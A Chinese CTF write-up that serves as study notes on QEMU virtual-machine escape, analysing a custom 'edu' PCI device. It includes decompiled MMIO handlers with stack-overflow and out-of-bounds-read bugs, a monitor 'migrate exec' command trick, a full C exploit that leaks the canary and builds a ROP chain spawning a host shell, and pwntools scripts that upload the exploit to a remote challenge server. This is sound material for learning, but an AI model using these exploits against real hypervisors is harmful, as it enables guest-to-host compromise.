qemu逃逸学习笔记

最新推荐文章于 2023-06-13 16:56:35 发布
最新推荐文章于 2023-06-13 16:56:35 发布
阅读量1.5k 收藏 4
点赞数 3
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31457355/article/details/117170589
版权

前言

记录一下qemu逃逸的基础知识以及做题相关的技巧
例题是津门杯的qemu逃逸,个人觉得比较简单适合入门

分析

run.sh
#! /bin/sh
./qemu-system-x86_64 \
-initrd ./rootfs.cpio \
-kernel ./vmlinuz-4.8.0-52-generic \
-append 'console=ttyS0 root=/dev/ram oops=panic panic=1 quiet' \
-monitor /dev/null \
-m 64M --nographic \
-L pc-bios \
-device edu,id=vda
非预期

首先我们需要注意的-monitor这一句,因为如果有的题目没有加这一句则有可能导致非预期的产生,具体的做法可以参考:链接
步骤是首先ctrl+a 然后输入c回车之后即可进入monitor模式,然后就可以为所欲为了,可以用migrate来执行命令读取flag

migrate "exec:cat flag 1>&2"
正常分析

如果有monitor这一句的话那就接着分析
可以注意到-device edu,我们将所给的qemu-system-x86_64文件导进ida中,因为文件比较大,因此需要一段时间,导入成功后我们搜索edu相关函数,可以看到如下

通常漏洞是数组越界以及栈溢出,产生漏洞的函数常常集中在pmmio以及mmio或者timer函数,因此我们着重分析这些函数,当然也不排除特殊情况,具体还要看相关题目来做具体的分析,因为本题只有mmio函数,我们只要分析mmio函数即可
这里还有一个注意点,由于ida分析函数的顺序问题,可能会出现试别不出结构题的情况这时候我们只需要切换到汇编模式,查看相应的rdi对应的结构体的名称,然后在反汇编的页面将rdi按y修改类型即可例如

可以看到初始时没有试别结构体的,然后我们按y来修改类型


可以看到成功识别结构体

edu_mmio_write
void __fastcall edu_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
  __int64 v4; // rdi
  __int64 v5; // rax
  __int64 v6; // rdx
  _BYTE v7[24]; // [rsp+0h] [rbp-28h]
  unsigned __int64 v8; // [rsp+18h] [rbp-10h]

  v8 = __readfsqword(0x28u);
  if ( addr <= 0xFF && size == 4 )
  {
    cmd_buf[(unsigned int)addr] = val;
  }
  else if ( addr == 296 )
  {
    if ( buf_len > 0 )
    {
      v4 = (unsigned int)(buf_len - 1);
      v5 = 0LL;
      do
      {
        v7[v5] = cmd_buf[v5];
        v6 = v5++;
      }
      while ( v4 != v6 );
    }
    if ( v7[4] == 3 )
      buf_len = 291;
  }
  else if ( addr == 304 )
  {
    buf_len = val;
  }

通过分析可以看到该函数主要实现了以下作用:
addr <= 0xff 将val赋值给cmd_buf[addr]处
addr = 0x130 将val赋值给buf_len
addr = 0x128 && buf_len>0 && v6!=v4将cmd_buf数组的内容逐字节赋值给v7数组
这里很容易发现有个栈溢出漏洞,可以溢出v7来达到栈溢出的目的

edu_mmio_read
uint64_t __fastcall edu_mmio_read(EduState *opaque, hwaddr addr, unsigned int size)
{
  uint64_t result; // rax
  char buf[16]; // [rsp+10h] [rbp-38h]
  unsigned __int64 v5; // [rsp+28h] [rbp-20h]

  v5 = __readfsqword(0x28u);
  if ( addr <= 0x2FF && size == 4 )
    return buf[(unsigned int)addr];
  if ( addr <= 0x7F && size != 4 )
    return buf_len + cmd_buf[addr];
  if ( ((size - 4) & 0xFFFFFFFB) == 0 || (result = -1LL, addr <= 0x7F) )
  {
    if ( addr <= 0x24 )
      __asm { jmp     rax }
    if ( addr != 144 )
    {
      if ( addr <= 0x90 )
      {
        if ( addr == 128 )
          return opaque->dma.src;
        if ( addr == 136 )
          return opaque->dma.dst;
      }
      else if ( addr == 152 )
      {
        return opaque->dma.cmd;
      }
      return -1LL;
    }
    result = opaque->dma.cnt;
  }
  return result;
}

这里调试的时候发现size恒等于4不知道为什么,希望有知道的师傅可以说一下。
因此按调试来说该函数只有一个功能即单字节返回buf[addr],这里也很容易的发现有一个数组越界漏洞可以越界读其他我们想要的内容,由于qemu-system文件已经有许多我们想要的函数因此只要读取canary以及程序基质就可以

首先记录一下编程访问mmio的函数

实现对MMIO空间的访问,比较便捷的方式就是使用mmap函数将设备的resource0文件映射到内存中,再进行相应的读写即可实现MMIO的读写,典型代码如下:

unsigned char* mmio_mem;

void mmio_write(uint32_t addr, uint32_t value)
{
    *((uint32_t*)(mmio_mem + addr)) = value;
}

uint32_t mmio_read(uint32_t addr)
{
    return *((uint32_t*)(mmio_mem + addr));
}

int main(int argc, char *argv[])
{

    // Open and map I/O memory for the strng device
    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
    if (mmio_fd == -1)
        die("mmio_fd open failed");

    mmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if (mmio_mem == MAP_FAILED)
        die("mmap mmio_mem failed");
}

具体要open的文件则要通过运行起来的虚拟机来看,操作步骤如下图所示


通过对应的数字我们可以定位到相应的文件,即要打开/sys/devices/pci0000:00/0000:00:04.0/resouse0,其中resouse0对应的mmio,resouse1对应的pmio,因为本题没有pmio因此便没有resouse1文件,我们cat一下resouse文件看一下

第一行对应的就是resouse0的start-address end-address flags

编程访问PMIO

UAFIO描述说有三种方式访问PMIO,这里仍给出一个比较便捷的方法去访问,即通过IN以及 OUT指令去访问。可以使用INOUT去读写相应字节的1、2、4字节数据(outb/inb, outw/inw, outl/inl),函数的头文件为<sys/io.h>,函数的具体用法可以使用man手册查看。
还需要注意的是要访问相应的端口需要一定的权限,程序应使用root权限运行。对于0x000-0x3ff之间的端口,使用ioperm(from, num, turn_on)即可;对于0x3ff以上的端口,则该调用执行iopl(3)函数去允许访问所有的端口(可使用man iopermman iopl去查看函数)。
典型代码如下:

uint32_t pmio_base=0xc050;

uint32_t pmio_write(uint32_t addr, uint32_t value)
{
    outl(value,addr);
}

uint32_t pmio_read(uint32_t addr)
{
    return (uint32_t)inl(addr);
}

int main(int argc, char *argv[])
{

    // Open and map I/O memory for the strng device
    if (iopl(3) !=0 )
        die("I/O permission is not enough");
        pmio_write(pmio_base+0,0);
    pmio_write(pmio_base+4,1);
 
}
调试

个人认为比较方便的调试方法和调试kernel的方法类似,就是打包解包rootfs.cpio
这里给出打包和解包的脚本将其放入/usr/local/bin目录下即可
解包:命令hen usage:hen 文件名
hen rootfs.cpio 会在当前目录下生成core文件夹,需要安装万能解压神器unar

#!/bin/bash
mv $1 $1.gz
unar $1.gz
mv $1 core
mv $1.gz $1
echo "[+]Successful"

打包:命令gen usage:gen 文件名
例如gen rootfs.cpio 需要在解包生成的core文件夹下执行

#!/bin/sh
find . -print0 \
| cpio --null -ov --format=newc \
| gzip -9 > $1 
mv $1 ..
具体的调试步骤

具体的调试步骤是在解包生成的core文件夹下写入exp,然后将其编译成静态文件,在然后将其打包,运行run.sh之后在新的窗口执行ps -ax |grep "qemu"获取相应的进程号,然后创建新的窗口执行下面的命令

sudo gdb ./qemu-system-x86_64
attach 相应的进程号


然后就可以调试了,下断点的方法有两种,一种是直接b 函数名称来下断点,一种是用b *$rebase(函数偏移地址)来下,然后在qemu中运行exp文件即可触发断点



最后就是poc编写了,由于本题漏洞较为简单,因此直接放exp了,有点丑==

#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>
#include<sys/io.h>

#define DMABASE 0x40000
char *userbuf;
uint64_t phy_userbuf;
unsigned char* mmio_mem;

void die(const char* msg)
{
    perror(msg);
    exit(-1);
}

uint8_t mmio_read(uint32_t addr)
{
    return *((uint8_t*)(mmio_mem + addr));
}

void mmio_write(uint32_t addr, uint8_t value)
{
    *((uint8_t*)(mmio_mem + addr)) = value;
}

int main(int argc, char *argv[])
{
    
    // Open and map I/O memory for the strng device
    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
    if (mmio_fd == -1)
        die("mmio_fd open failed");

    mmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if (mmio_mem == MAP_FAILED)
        die("mmap mmio_mem failed");

    printf("mmio_mem @ %p\n", mmio_mem);
    uint8_t canary[0x8];
    unsigned int i = 0;
    for(i = 0;i<0x8;i++){
        canary[i] = mmio_read(0x18+i);
        canary[i] = canary[i] & 0xff;
        printf("0x%llx\n", canary[i]);
    }
    uint8_t codebase[0x8];
    for(i = 0;i<0x8;i++){
        codebase[i] = mmio_read(0x38+i);
        codebase[i] = codebase[i] & 0xff;
        printf("codebase[%d]: 0x%llx\n",i,codebase[i]);
    }
    uint8_t codebase1[0x8];
    uint64_t codebase_addr = codebase[0]*1;
    codebase_addr += codebase[1]*0x100;
    codebase_addr += codebase[2]*0x10000;
    codebase_addr += codebase[3]*0x1000000;
    codebase_addr += codebase[4]*0x100000000;
    codebase_addr += codebase[5]*0x10000000000;
    codebase_addr += codebase[6]*0x1000000000000;
    codebase_addr -= 0x31f7c2;

    printf("0x%llx\n",codebase_addr);
    uint64_t pop_rax = 0x0000000000303b55+codebase_addr;
    uint64_t pop_rdi = codebase_addr + 0x00000000002c9f73;
    uint64_t pop_rsi = 0x00000000002cb007 + codebase_addr;
    uint64_t pop_rdx = 0x000000000030d0b5 + codebase_addr;
    uint64_t sh_addr = 0x85a25c + codebase_addr;
    uint64_t system_addr = 0x2c4764 + codebase_addr;
    uint64_t pop_rcx = 0x0000000000304787+codebase_addr;
    uint64_t pop_syscall = 0x0000000000608041+codebase_addr;
    printf("system: 0x%llx\n",system_addr); 
    printf("pop_rdi: 0x%llx\n",pop_rdi); 
    printf("pop_rsi: 0x%llx\n",pop_rsi); 
    uint64_t rop[0x200] = {0};
    
    //for i in range()
    for(i = 0;i < 0x8;i++){
        uint8_t x = 8*i;
        mmio_write(0x28+i,(pop_rdi >> (x)) & 0xff);
    }
    for(i = 0;i < 0x8;i++){
        uint8_t y = 8*i;
        mmio_write(0x30+i,(sh_addr >> (y)) & 0xff);
    }
    for(i = 0;i < 0x8;i++){
        uint8_t y = 8*i;
        mmio_write(0x38+i,(pop_rsi >> (y)) & 0xff);
    }
    for(i = 0;i < 0x8;i++){
        uint8_t y = 8*i;
        mmio_write(0x40+i,'\x00');
    }
    for(i = 0;i < 0x8;i++){
        uint8_t y = 8*i;
        mmio_write(0x48+i,(pop_rdx >> (y)) & 0xff);
    }
    for(i = 0;i < 0x8;i++){
        uint8_t y = 8*i;
        mmio_write(0x50+i,'\x00');
    }
    for(i = 0;i < 0x8;i++){
        uint8_t z = 8*i;
        mmio_write(0x58+i,(pop_rax >> (z)) & 0xff);
    }
    uint64_t rax = 59;
    for(i = 0;i < 0x8;i++){
        uint8_t z = 8*i;
        mmio_write(0x60+i,(rax >> (z)) & 0xff);
    }
    for(i = 0;i < 0x8;i++){
        uint8_t z = 8*i;
        mmio_write(0x68+i,(pop_syscall >> (z)) & 0xff);
    }
    for(i = 0;i < 0x8;i++){
        uint8_t z = 8*i;
        mmio_write(0x70+i,(rax >> (z)) & 0xff);
    }
    for(i = 0;i< 0x8;i++){
        mmio_write(0x20+i-0x8,canary[i]);
    }
    mmio_write(0x128,'a');

    //printf("0x%s\n",canary);

}
//b *$rebase(0x4E59B2)

上传脚本可以用下面的脚本上传
#####上传脚本:
需要在当前目录下创建一个poc文件并将其中的c代码命名为exp.c

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import os

# context.log_level = 'debug'
cmd = '$ '


def exploit(r):
    r.sendlineafter(cmd, 'stty -echo')
    os.system('musl-gcc  -static -O2 ./poc/exp.c -o ./poc/exp')
    os.system('gzip -c ./poc/exp > ./poc/exp.gz')
    r.sendlineafter(cmd, 'cat <<EOF > exp.gz.b64')
    r.sendline((read('./poc/exp.gz')).encode('base64'))
    r.sendline('EOF')
    r.sendlineafter(cmd, 'base64 -d exp.gz.b64 > exp.gz')
    r.sendlineafter(cmd, 'gunzip ./exp.gz')
    r.sendlineafter(cmd, 'chmod +x ./exp')
    r.sendlineafter(cmd, './exp')
    r.interactive()


# p = process('./startvm.sh', shell=True)
p = remote('nc.eonew.cn',10100)

exploit(p)

上传脚本2:

#coding:utf8
from pwn import *
import base64
context.log_level = 'debug'
os.system("musl-gcc 1.c -o exp --static")
sh = remote('127.0.0.1',5555)
 
f = open('./exp','rb')
content = f.read()
total = len(content)
f.close()
per_length = 0x200;
sh.sendlineafter('# ','touch /tmp/exploit')
for i in range(0,total,per_length):
   bstr = base64.b64encode(content[i:i+per_length])
   sh.sendlineafter('# ','echo {} | base64 -d >> /tmp/exploit'.format(bstr))
if total - i > 0:
   bstr = base64.b64encode(content[total-i:total])
   sh.sendlineafter('# ','echo {} | base64 -d >> /tmp/exploit'.format(bstr))
 
sh.sendlineafter('# ','chmod +x /tmp/exploit')
sh.sendlineafter('# ','/tmp/exploit')
 
 
sh.interactive()
参考

https://ray-cp.github.io/archivers/qemu-pwn-Blizzard-CTF-2017-Strng-writeup#strng_mmio_read

cnitlrt
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
【嵌入式Linux开发学习rootfs通过ramfs挂载技巧
yy197696的博客
10-23 1466
在使用initramfs的过程中我感觉相比于传统的我们直接挂载块设备/dev/mmcblk0 /mmc/sda1 之类的挂载点来看相比于读写块设备 ,读写ram总归是会快很多的,系统性能会有所提高。可以避免一些需要频繁擦写数据的情况对于块设备的消耗,可以提升设备寿命,对于不怎么开关机长期保持上电状态的设备比如交换机,网桥之类尤其如此。
qemu搭建arm运行linux内核,centos使用qemu搭建ARM64运行环境
weixin_42339759的博客
05-02 795
准备工作(1) linux 内核源码, 从github上获取git clone https://github.com/torvalds/linuxmake kernelversion(2) 交叉编译工具,从linaro官网(www.linaro.org)上获取解压后设置环境变量即可xz -d gcc-linaro-xxx.tar.xztar -xvf gcc-linaro-xxx.tarexpor...
qemu逃逸小识
weixin_45209963的博客
10-15 1686
实际上,看过单片机datasheet的同学就会发现,单片机的数据读取/发送,命令执行等等都是受外加电平控制的,我们设想计算机将自己的总线分别接到单片机芯片上,就能明白为什么对地址空间读写就相当于操作外设。(简单来说就是,你写的exp里面mmap分的地址,只在exp程序内,或者说qemu虚拟出来的系统的用户态下有意义,对qemu-system下你自己写的其他程序来说是在同一个地址空间内,但仅此而已)qemu设备号的查看、地址的读取和地址空间的转换,上面两位师傅的blog里面已经写的很清晰了。
Qemu 逃逸基础知识
sky123博客
06-12 1615
QEMU 与 KVM 的完整架构如下图所示。其中 VMX root 和 VMX non-root 都是 CPU 引入了支持硬件虚拟化的指令集 VT-x 之后出现的概念。虚拟机在 VMX root 模式和 VMX non-root 模式下都有 ring 0 到 ring 3 四个特权级别。
QEMU 逃逸相关例题
sky123博客
06-13 1073
实际上只能使用第二种方式,因为 PCI 设备内部会对访问的内存区域进行检查,不允许超过分配。的合法区间,因而我们只能通过第二种方式构造越界读写原语。上设置定时任务,不过时间设置为 -1 因此不会执行。函数定义如下,也就是说这里会将该定时任务时间设置为。位于 qemu 上,地址小于堆地址,而越界写。无法将下标设为负数,因此考虑其他方法。指向参数地址,从而实现任意命令执行。结构体的内容如下,其中。从前面的调试结果可以看到。实现虚拟机逃逸,由于。函数调用链如下,根据。的参数可知,最终会将。初始值为 1 ,而在。
qemu逃逸 XNUCA2019-vexx
最新发布
11-19
附件
qemu逃逸 DefconQuals2018-EC3
11-19
附件
基于QEMU的文件系统学习笔记二.pdf
10-21
基于QEMU的文件系统学习笔记二.pdf
kvm学习笔记.pdf
12-20
KVM学习笔记 KVM(Kernel-based Virtual Machine)是一种开源的虚拟机软件,它可以在物理机器上运行多个虚拟机,每个虚拟机可以独立地运行不同的操作系统。KVM系统学习笔记涵盖了KVM系统的基本概念、安装、配置、...
Qemu KVM and Libvirt
04-29
Qemu KVM and Libvirt Qemu KVM 和 Libvirt 是虚拟化领域中的三个重要概念,分别是虚拟机监控器、内核模块和虚拟机管理工具。本文将对这三个概念进行解析,并探讨它们之间的关系。 虚拟化的基本类型 虚拟化可以...
qemu-kvm和ESXi虚拟机逃逸实例分享.pdf
09-10
qemu-kvm和ESXi虚拟机逃逸实例分享 APT 安全防御 应急响应 安全建设 红蓝对抗
Qemu退出快捷键和原理解析
Loyal1992的专栏
04-25 3140
1、退出快捷键 大家在用Qemu时经常会遇到要退出的情况。一般做法是使用ps或者lsof等命令找出qemu的进程ID,使用KILL命令杀死,该做法相当繁琐。实质上,Qemu已经设计了退出的快捷键:按下ctrl+a,之后按大写X。 2、代码分析 Qemu的所有交互输入时通过字符设备来实现的。具体退出的检查在路径“chardev/char-mux.c”文件的函数mux_proc_byte中。 /* ctrl+a 按键的标志位 */ int term_escape_char = 0x01; /* ctrl-a i
qemu 使用方法
Richard的专栏
10-16 1万+
qemu 虚拟机使用说明#qemu-img create windows.img 2G #这个就是创建虚拟机磁盘,2G大小#qemu -hda windows.img -cdrom /dev/acd0 -boot d -m 512 -enable-audio -localtime-hda 是指定硬盘-cdrom 指定使用光驱,这个参数后面必须要跟个文件名,可以是物理
2022CTF培训(十三)虚拟化&QEMU架构分析&QEMU CVE示例分析
sky123博客
02-08 1181
全虚拟化结构如下图所示,Guest被给予Ring1层的特权级。实际上,Guest也可以在Ring3层中执行。 由于GuestOS不是运行在内核态,所以其不能直接操作硬件设备。为了解决这个问题,VMM引用了两个机制——二进制翻译和陷入模拟。陷入模拟 在陷入模拟方式的VMM中,客户机代码直接运行在CPU上,但降低权限(reduced privilege)。 当客户机尝试读或修改特权状态时,处理器会将控制权交给VMM的相关处理函数。 VMM随后使用解释器模拟指令并在下一条指令恢复客户机代码的直接执行。 X86
使用QEMU ARM64虚拟机
热门推荐
liuhangtiant的博客
05-13 1万+
安装qemu 可以通过apt-get install在线安装,也可以从qemu官网下载最新源码,编译安装。这里建议到qemu官网(https://www.qemu.org/)下载最新源码,编译安装,安装的时候选择需要的target-list,我们这里需要ARM64虚拟机,所以选择aarch64-softmmu即可,如果全部编译,会很慢。编译方法: ./configure –target-lis...
qemu 文件系统制作:自己制作根目录和应用程序 + busybox
think_ycx的专栏
06-25 7132
参考陈香兰老师Linux源码分析的课件,编译完linux源码之后,准备制作一个文件系统。 本文介绍了两种文件系统的生成方式,包括:     1. 自己制作init和/dev/ram和/dev/console(遇到了文件系统的错误,花了很长时间才解决)     2. 利用busybox生成文件系统。 0x01首先创建一个应用程序 这个程序作为init程序,是linux启动后准备执行的程序。 ...
Ubuntu下为QEMU建立一个arm平台的可用的根文件系统rootfs
08-15 424
【记录】Ubuntu下为QEMU建立一个arm平台的可用的根文件系统rootfs 2013 年 8 月 19 日 下午 3:59crifan已有952人围观我来说几句 【背景】 折腾: 【记录】尝试用QEMU模拟ARM开发板去加载并运行Uboot,kernel,rootfs 期间,折腾完毕,可以运行kernel: 【记录】Ubuntu下使用QEMU启动Linux内核 后,接着
一步步教你如何在ubuntu虚拟机中安装QEMU并模拟arm 开发环境(二)rootfs制作
IT---庸才 的博客
09-10 1万+
过了,一天,周又到了,博主终于可以拿出时间来把上一次没有给大家展示完了的内容今天在这里一并展示给大家,希望和大家共同进步,共同学习,同时我也虔诚的希望各位业界的朋友把自己的工作经验拿出来大家一起分享,一起交流,一起学习,技术的革新少不了大家努力!!!,好了。废话不多说,开始今天的内容吧: 第一部分:制作根文件系统 1.其实对于这个根文件系统,博主一直没有搞明白,何为根文件,想必
cpio打包和压包*.cpio.gz操作方法示例
u011774239的专栏
06-20 1万+
如何解压或是打包mini-rootfs-arm64.cpio.gz? 这种类型的包,是通过cpio和gzip这两步压包获得的,所以解压也需要经过这两步。 一:压包 例如:打包test目录下 test@ubuntu3:~/fs/test$ test@ubuntu3:~/fs/test$ ls bin   dev  home  lib      mnt  proc  ru
推荐一些 qemu 学习内容
05-05
以下是一些学习 QEMU 的资源: 1. QEMU 官方文档:QEMU 官方提供了详细的文档和手册,包括用户手册、开发者手册等。 2. QEMU 的 GitHub 页面:QEMU 的 GitHub 页面提供了 QEMU 的源代码和文档,以及开发者社区和邮件列表等信息。 3. QEMU Wiki:QEMU 的 Wiki 提供了 QEMU 的详细资料和文档,包括安装指南、使用指南、开发指南等。 4. QEMU 教程:在网上可以找到很多 QEMU 的教程和指南,包括如何使用 QEMU 进行虚拟化、如何编写 QEMU 设备模拟器等。 5. QEMU 实战指南:《QEMU 实战指南》是一本介绍 QEMU 基础知识和实战经验的书籍,适合初学者和有一定经验的开发者阅读。 6. QEMU 源代码分析:如果想深入了解 QEMU 的内部实现,可以阅读 QEMU 的源代码,了解 QEMU 的实现原理和细节。 希望这些资源能够帮助你更好地学习 QEMU

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值